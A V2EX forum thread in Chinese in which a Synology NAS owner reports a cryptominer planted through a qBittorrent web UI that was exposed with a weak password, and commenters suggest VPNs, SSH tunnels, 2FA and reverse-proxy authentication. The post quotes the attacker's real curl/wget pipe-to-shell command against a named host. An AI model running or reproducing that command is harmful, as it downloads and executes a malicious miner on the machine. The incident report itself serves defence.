首页 注册 登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
请不要把任何和邀请码有关的内容发到 NAS 节点。

邀请码相关的内容请使用 /go/in 节点。

如果没有发送到 /go/in,那么会被移动到 /go/pointless 同时账号会被降权。如果持续触发这样的移动,会导致账号被禁用。
hiyoi
V2EX  ›  NAS

记一次群晖开 qbittorrent 被植入挖矿代码

  •   
  •   hiyoi · 3 天前 · 2197 次点击
    起因:
    偶然发现群晖 cpu 内存占用率很高。

    查看进程发现有个进程以 qbittornet 用户运行这一个 名叫./PHsyYPRT 进程,名字很古怪,占了 2 核 cpu ,30%内存。

    起初怀疑是 qbit 问题,马上停止套件,进程消失。 但是又过了几天,又发现相同的进程。 一顿搜索

    参考:
    https://www.reddit.com/r/synology/comments/1co3toi/rogue_process_eating_ram/?tl=zh-hans

    发现攻击者可以在 web ui, 设置 torrent 下载完成时执行外部程序:
    sh -c "(curl -sk https://fulminare.top || wget --no-check-certificate -qO - https://fulminare.top) | sh"

    考虑到之前 web ui 曾开到公网过,且用了弱密码。被轻易爆破的可能性很大。

    赶紧把 web ui 公网关掉。
  • 挖矿
  • qbit
  • webui
    22 条回复    2025-06-11 23:38:07 +08:00
    ererrrr
        1
    ererrrr  
       3 天前
    要用组网呀
    guanzhangzhang
        2
    guanzhangzhang  
       3 天前
    异地组成局域网,就没这么多事情了,三层都是通的,而不是映射端口啥的
    needhourger
        3
    needhourger  
       3 天前   ❤️ 5
    弱密码公开到公网啊,那没事了😅
    justNoBody
        4
    justNoBody  
       3 天前
    谢谢分享
    vpsvps
        5
    vpsvps  
       3 天前
    qbittorrent 套件源有问题吧
    bao3
        6
    bao3  
       3 天前
    tailscale ,headscale ,wireguard 等等,大家讨论异地组网就是为了家庭服务不用公网公开。
    yazinnnn0
        7
    yazinnnn0  
       3 天前
    用 ssh -L 4000:127.0.0.1:4000 之类的办法把端口转发到本机啊... 随便一个应用就放公网太危险了
    hiyoi
        8
    hiyoi  
    OP
       3 天前 via Android
    @vpsvps 应该不是,用的矿神群晖 spk 源下的 qbit 套件版,如果有问题应该早就爆出来了
    hiyoi
        9
    hiyoi  
    OP
       3 天前 via Android   ❤️ 1
    再不敢轻易放服务到公网了
    JensenQian
        10
    JensenQian  
       3 天前
    JensenQian
        11
    JensenQian  
       3 天前
    xiaozhubin
        12
    xiaozhubin  
       2 天前
    之前群晖安了个 qb, 也是映射外网了,有次突然发现下载列表里出现了一个我从未下载过的资源,就把外网关了,现在只在内网用了。
    hiyoi
        13
    hiyoi  
    OP
       2 天前 via Android
    @xiaozhubin 对公的服务最好是带 2FA 的。我还开着一个 vaultwarden ,开着 2FA ,一直稳定运行。
    montaro2017
        14
    montaro2017  
       2 天前
    @JensenQian #11 真能搜到啊
    okzy520
        15
    okzy520  
       2 天前 via iPhone
    我也是发现 qbit 认证太简单了 就把外网给关了
    之后就用 zerotier 了 个人自建的要是不支持 2FA 最好别往外放
    pcloves
        16
    pcloves  
       2 天前
    @hiyoi 话说这个 qbit 怎么开 2FA 啊?
    anjing01
        17
    anjing01  
       2 天前
    前面加个 APACHE/NGINX ,配置个 BasicAuth 认证+限制国外 IP 访问(甚至只允许你所在省份 IP 访问)+ 访问日志 403 的 IP 地址 ipset 加入 blocklist ,基本上没啥问题(服务器带外需要 WEB 放出来);
    WG 也用,不过那个主要是给外部访问 SAMBA 共享、远程桌面用的;
    obeykarma
        18
    obeykarma  
       2 天前
    我套了 HTTPS 直接对公网,改了用户名和密码

    应该没什么安全隐患,最多扫端口发现我在用 qb 了
    hiyoi
        19
    hiyoi  
    OP
       1 天前 via Android
    @obeykarma 用强密码就没事
    okzy520
        20
    okzy520  
       1 天前
    @pcloves qbit 就没这个能力 别想了
    官方论坛上有个帖子解释的 大意什么服务能开放到什么程序是有条件的 用户应该自己评估
    不过 qbit 自己的做法已经是在变相告诉你 仅限内网使用了
    starrys
        21
    starrys  
       23 小时 53 分钟前
    @hiyoi #19 真是带不动你。楼上那么多人说要组网、防火墙控制,感觉你都没听进去,仍然觉得设置 2FA 、强密码就可以了,这样虽然安全程度有所提升,但还不够的,原因是“应用程序可能存在未知的漏洞导致你的主机被攻破”。
    hiyoi
        22
    hiyoi  
    OP
       23 小时 48 分钟前 via Android
    @starrys 你要这么说,那就没有什么应用程序是绝对的安全。 强密码+2FA 是现在公认的比较安全的方案。

    btw ,我已经把 qbit web ui 端口转发公网关了。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2667 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 15:26 · PVG 23:26 · LAX 08:26 · JFK 11:26
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.